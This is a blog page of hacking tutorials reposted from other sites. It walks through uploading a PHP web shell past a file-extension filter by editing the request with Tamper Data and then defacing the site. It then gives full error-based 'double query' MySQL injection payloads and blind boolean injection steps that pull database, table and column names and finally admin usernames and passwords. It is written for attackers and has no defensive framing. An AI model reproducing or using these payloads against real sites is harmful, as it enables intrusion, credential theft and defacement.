This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Sunday, 3 March 2013

Shell Upload Via Tamper Data

09:10    No comments

Hello Hackerz!!

Sometimes You're In Trouble Of Uploading Shell In The Server With The "shell.php" Format. So Here's The Solution.



Let's Have A Look. 
At First  Install Add-on "Tamper Data" In Mozilla Firefox. Go Here For Tamper Data.



Now Change The Shell Name Into ".jpg Format" Like This,



shell.php;.jpg
shell.php.jpg
shell.php..jpg
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;


Now Go To The Uploader URL. Let The Uploader URL:

http://www.targetsite.com/upload.php




Now Select Your Shel In The Above format But To Select The Upload Button. Because Before That You've To Configure Tamper Data. Open Tamper Data From Mozilla.

Firefox > Tools > Tamper Data.

So Let's Have A Look:

  




Now You've To Click "Start Tamper" From Tamper Data Window And Start Tampering. Before Tampering Close All Other Tabs.

Now Click Upload Button From Your Target Site To Upload Your Shell.

Now You should Get Tamper Request With Your Target Site. Click Tamper.



 Now You Should Get "Tamper Popup" Window. From Here You've To Change Your Shell Format Into  ".php".








At The Right Side Have A Look At "Post Parameter Value" Section And Find Your Shell Name. Change It Like "shell.php" And Press Ok.

Great!!

Now Submit.

All Is Done.

Now Got To Your Shell And Deface It :D :D
- See more at: http://www.defencexposure.com/2013/01/shell-upload-via-tamper-data.html#sthash.tIzbXV3l.dpuf

Read More

[tut]double query(error based blind sqli)[/tut]

09:02    No comments


DOUBLE QUERY SQLI(ERROR BASED BLIND MYSQLI)

This my first tutorial so i don't know how to write a tut....and sorry for wrong English

let start the tutorial->>


1.To test the site its is vulnerable to sqli or not.

check on Mysql inj variable substitutions in a single quotes:

Quote:http://www.site.com/index.php?page=1'

the result should something like this:

Quote:MySQL Error: mysql_query (.......) error expretion syntax ...

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result)

follow this until we get error:

http://www.site.com/news.php?id=5+order+by+1+--+ (no error)

http://www.site.com/news.php?id=5+order+by+2+--+ (no error)

http://www.site.com/news.php?id=5+order+by+3+--+ (no error)

http://www.site.com/news.php?id=5+order+by+4+--+ (no error )

http://www.site.com/news.php?id=5+order+by+5+--+ (error (we get message like this Unknown column '4' in 'order clause'

or something like that))

that means that the it has 4 columns, cause we got an error on 5.

3). Check for UNION function

With union we can select more data in one sql statement.

so we have

http://www.site.com/news.php?id=-5+union...,2,3,4+--+ (we already found that number of columns are 3 in section 2).

)

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works......"IF UNION WORKED SO W DON'T NEED DOUBLE QUERY"

If its give error like this

Quote:THE SELECT STATEMENT HAVE DIFFERENT NUMBER OF COLUMN...................etc

now is the time to use double query to get some information..... : )

4. To find the current database,current user,version....etc

TO find version():

here the code:

Code:
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

example:
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Output:
Quote:Duplicate entry '~'5.0.91-community'~1' for key 1

TO find database():

here the code:
Code:
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

example:
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Output:
Quote:Duplicate entry '~'database_name~1' for key 1



TO count how many database are there and try to get the name of db:

Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

output:

Quote:Duplicate entry '~'number of db~1' for key 1


TO print all db one by one use this code: 

Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


Keep incrementing the "N" here...."LIMIT N,1"
LIMIT 0,1
LIMIT 1,1
LIMIT 2,1 ..... till you keep getting a response.


Quote:http://www.site.com/news.php?id=5 and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1





TO find user():

here the code:
Code:
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

example:
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select
count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Output:
Quote:Duplicate entry '~'database_name@localhost'~1' for key 1





5.To count the number of tables in the selected database and print the table one by one:


To count the table in selected db:

here the code:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE
table_schema=0xhex_code_of_database_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

NOTE:before doing this convert Ur db name to hex......becoze it using here in

code->>"table_schema=0xhex_code_of_database_name_which_u_selected"
Output:
Quote:Duplicate entry '~'number_of_table(e.g 10)~1' for key 1



Now to print table name one by one:

here the code:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where
table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1


now suppose db have 10 table and u want all table name do this in above code:

Keep incrementing the "N" in code upto10 times...."LIMIT N,1"
LIMIT 0,1
LIMIT 1,1
LIMIT 2,1
.
.
LIMIT 10,1 u get all table_name of selected db

6.To get number of columns in the selected table name and print the column_name which r in table

To count column in selected table:

here the code:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE
table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

NOTE:before apply this see this also in code->> "table_schema=0xhex_code_of_database_name AND

table_name=0xhex_code_of_table_name"convert ur table_name and db_name to hex

example:
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select count(*),concat((select (select
(SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0x074a24c45 AND
table_name=0x074a24c4523d1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables
group by x)a) and 1=1

Output:
Quote:Duplicate entry '~'number_of_column(e.g 5)~1' for key 1



Now time for print column_name which r in table one by on

code here:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where
table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name LIMIT N,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

now suppose db have 5 column and u want all column name do this :

Keep incrementing the "N" in code upto 5 times...."LIMIT N,1"
LIMIT0,1 
LIMIT 1,1
LIMIT 2,1
.
LIMIT 5,1 u

get all column_name of selected table

example:
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select count(*),concat((select (select (SELECT
distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=074a24c45
AND table_name=0x074a24c4523d1 LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

7.final step To fetch records from a selected column

now we know every things table_name or column_name.........

to fetch out data here the code:
Code:
and(select 1 from(select count(*),concat((select (select
(SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

note:keep incremental N here in code->>LIMIT N,1 till u get result...........

example:
suppose db name is "sandeep_1024", table name is "admin" which r in db sandeep_1024 and column name is

"password" which r in table admin know we want password
we use that code like this:

Quote:http://www.site.com/news.php?id=5 and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,cast(admin.password as char),0x27,0x7e) FROM `sandeep_1024`.admin LIMIT 0,1) ) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Output:
Quote:Duplicate entry '~'hack forums~1' for key 1



- See more at: http://voice0fblackhat.blogspot.com/2012/01/tutdouble-queryerror-based-blind.html#sthash.sXiWwRkX.dpuf

Read More

Blind SQL Injection

09:02    No comments

Let's start with advanced stuff.

I will be using our example

http://www.site.com/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc...

then when we want to test it for blind sql injection attack

http://www.site.com/news.php?id=5 and 1=1 <--- this is always true

and the page loads normally, that's ok.

now the real test

http://www.site.com/news.php?id=5 and 1=2 <--- this is false

so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

1) Get the MySQL version

to get the version in blind attack we use substring

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works

when select don't work then we use subselect

i.e

http://www.site.com/news.php?id=5 and (select 1)=1

if page loads normally then subselects work.

then we gonna see if we have access to mysql.user

i.e

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend :)

i.e.

http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one :)

let's say that we have found that table name is users, now what we need is column name.

the same as table name, we start guessing. Like i said before try the common names for columns.

i.e

http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page loads normally we know that column name is password (if we get false then try common names or just guess)

here we merge 1 with the column password, then substring returns the first character (,1,1)


4). Pull data from database

we found table users i columns username password so we gonna pull characters from that.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users.

substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value

and then compare it with simbol greater then > .

so if the ascii char greater then 80, the page loads normally. (TRUE)

we keep trying until we get false.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

then let's check the second character.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!

we know that the second character is char(105) and that is 'i'. We have 'ci' so far

so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually, - See more at: http://voice0fblackhat.blogspot.com/2012/01/blind-sql-injection.html#sthash.6I9yDDrs.dpuf

Read More
Subscribe to: Posts (Atom)